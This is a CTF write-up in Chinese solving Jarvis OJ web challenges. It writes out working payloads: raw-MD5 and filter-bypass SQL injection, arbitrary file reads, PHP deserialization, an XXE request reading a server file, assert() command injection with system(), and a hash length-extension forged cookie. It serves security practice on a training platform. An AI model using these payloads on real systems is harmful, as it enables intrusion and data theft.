Jarvis OJ - Web
Login
bp抓包,得到hint
Hint: "select * from `admin` where password='".md5($pass,true)."'"
php中的md5函式,包含兩個引數:string(必須)、raw(可選)
- strings:規定計算的字串
- raw:TRUE(1原始二進位制格式的字串),FALSE(預設,32位16進位制格式)
md5('ffifdyop',true) // 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c // select * from `admin` where password=''or'6]!r,b' // PCTF{R4w_md5_is_d4ng3rous}
神盾局的祕密
檢視原始碼發現任意檔案讀取漏洞:
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>
嘗試讀取showimg.php
檔案內容
view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=
<?php $f = $_GET['img']; if (!empty($f)) { $f = base64_decode($f); if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE && stripos($f,'pctf')===FALSE) { readfile($f); } else { echo "File not found!"; } } ?>
發現過濾了../\\pctf
等字元,讀取index.php
看看
view-source:http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw
<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
$x = unserialize($g);
}
echo $x->readfile();
?>
繼續讀取shield.php
view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==
<?php
//flag is in pctf.php
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
}
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
}
}
}
?>
結合index.php
和shield.php
,可以得知flag在pctf.php
中,通過反序列化讀取
payload
<?php
class Shield{
public $file;
function __construct($filename = '') {
$this -> file = "pctf.php";
}
}
$payload='class='.new Shield();
echo serialize($payload)
?>
// output: class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
<?php
//Ture Flag : PCTF{W3lcome_To_Shi3ld_secret_Ar3a}
//Fake flag:
echo "FLAG: PCTF{I_4m_not_fl4g}"
?>
IN A Mess
檢視網頁原始碼,發現index.phps
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])
{
header('Location: index.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'Hahahahahaha';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("flag.txt");
}
else
{
print "work harder!harder!harder!";
}
?>
三個引數id,a,b
,需要滿足如下:
id
:等於0且!$id
為True;0e繞過
a
:不能包含.
,同文件$a
的內容為1112 is a nice lab!
;data://繞過(data://text/plain;base64,)
b
:長度需要大於5,且111+b[0]==1114
,b[0] != '4'
;%00
截斷(strlen函式對%00不截斷但substr截斷)
payload:
http://web.jarvisoj.com:32780/index.php?id=0e&a=data:,1112%20is%20a%20nice%20lab!&b=%004111111
#output:Come ON!!! {/^HT2mCpcvOLf}
得到一個檔案路徑,訪問重定向到
http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1
存在sql注入,測試發現大部分的字元都被過濾掉了,可以通過雙寫繞過關鍵字,/*1*/
r繞過空格
1. index.php?id=2/*1*/ununionion/*1*/selselectect/*1*/1,2,3
2. 表名為content
3. index.php?id=2/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(column_name)/*1*/frfromom/*1*/information_schema.columns/*1*/where/*1*/table_name=0x636f6e74656e74
4. index.php?id=2/*1*/ununionion/*1*/selselectect/*1*/1,2,context/*1*/frfromom/*1*/content
# PCTF{Fin4lly_U_got_i7_C0ngRatulation5}
api呼叫
檢視原始碼,發現XXE漏洞
function XHR() {
var xhr;
try {xhr = new XMLHttpRequest();}
catch(e) {
var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
for (var i=0,len=IEXHRVers.length;i< len;i++) {
try {xhr = new ActiveXObject(IEXHRVers[i]);}
catch(e) {continue;}
}
}
return xhr;
}
function send(){
evil_input = document.getElementById("evil-input").value;
var xhr = XHR();
xhr.open("post","/api/v1.0/try",true);
xhr.onreadystatechange = function () {
if (xhr.readyState==4 && xhr.status==201) {
data = JSON.parse(xhr.responseText);
tip_area = document.getElementById("tip-area");
tip_area.value = data.task.search+data.task.value;
}
};
xhr.setRequestHeader("Content-Type","application/json");
xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
通過ajax傳送json資料
xhr.setRequestHeader("Content-Type","application/json");
bp抓包,修改為Content-Type: application/xml
,引用外部實體注入來讀取檔案
payload
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
Content-Length: 138
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/xml
Accept: */*
Origin: http://web.jarvisoj.com:9882
Referer: http://web.jarvisoj.com:9882/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=175adad30a81d4-06fa5d0e758aac-326e7207-13c680-175adad30a9626
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE patload [<!ENTITY file SYSTEM "file:///home/ctf/flag.txt">]>
<payload>&file;</payload>
# CTF{XxE_15_n0T_S7range_Enough}
[61dctf]admin
檢視robots.txt
,發現admin_s3cr3t.php
,訪問得到一個fake flag:flag{hello guest}
bp抓包,修改admin=1,得到flag:flag{hello_admin~}
[61dctf]babyphp
.git
原始碼洩漏,通過GitHacker給download下來,讀取index.php
關鍵程式碼
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
<?php
require_once $file;
?>
過濾掉了字元..
assert函式能夠將字串引數當作php程式碼來執行,可以利用此來執行命令
payload
?page='.system("cat templates/flag.php").'
1. $file = 'templates/'.system("cat templates/flag.php").'.php';
2. assert("strpos('templates/'.system("cat templates/flag.php").'.php', '..') === false");
3. assert("file_exists('templates/'.system("cat templates/flag.php").'.php')");
# 最後都會執行 system("cat templates/flag.php")
# 61dctf{8e_careful_when_us1ng_ass4rt}
flag在管理員手裡
掃描目錄得到index.php~
檔案,下載下來是亂碼,修改檔名為index.php.swp
通過vim恢復
vim -r index.php.swp
關鍵程式碼
<?php
$auth = flase;
$role = 'guest';
$salt =
if (isset($_COOKIE["role"])) {
$role = unserialize($_COOKIE["role"]);
$hsh = $_COOKIE["hsh"];
if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
$auth = true;
}
else {
$auth = false;
}
}
else {
$s = serialize($role);
setcookie('role',$s);
$hsh = md5($salt.strrev($s));
setcookie('hsh',$hsh);
}
if ($auth) {
echo "<h3>Welcome Admin. Your flag is
}
else {
echo "<h3>Only Admin can see the flag!!</h3>";
}
?>
strrev
: 字串反轉
此題的關鍵在於$hsh === md5($salt.strrev($_COOKIE["role"]
, 對此通過hash長度擴充套件攻擊(具體可參考 http://blog.nsfocus.net/hash-length-extension-attack/)來實現
- 通過hash長度擴張攻擊,知道
salt
長度和hash($salt+strrev($role))
的條件下,能夠計算出hash($salt+strrev($role)+$追加訊息)
的值,可通過hashpump
這一工具來計算 - salt長度可列舉爆破(在此就不操作了,最後得到為12)
Input Signature: 3a4727d57463f122833d9e732f94e4e0
Input Data: ;"tseug":5:s
Input Key Length: 12
Input Data to Add: ;"nimda":5:s
fcdc3840332555511c4e4323f6decb07
;"tseug":5:s\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00;"nimda":5:s
payload
role=s%3A5%3A%22admin%22%3B%00%00%00%00%00%00%00%C0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80s%3A5%3A%22guest%22%3B; hsh=fcdc3840332555511c4e4323f6decb07
PCTF{H45h_ext3ndeR_i5_easy_to_us3}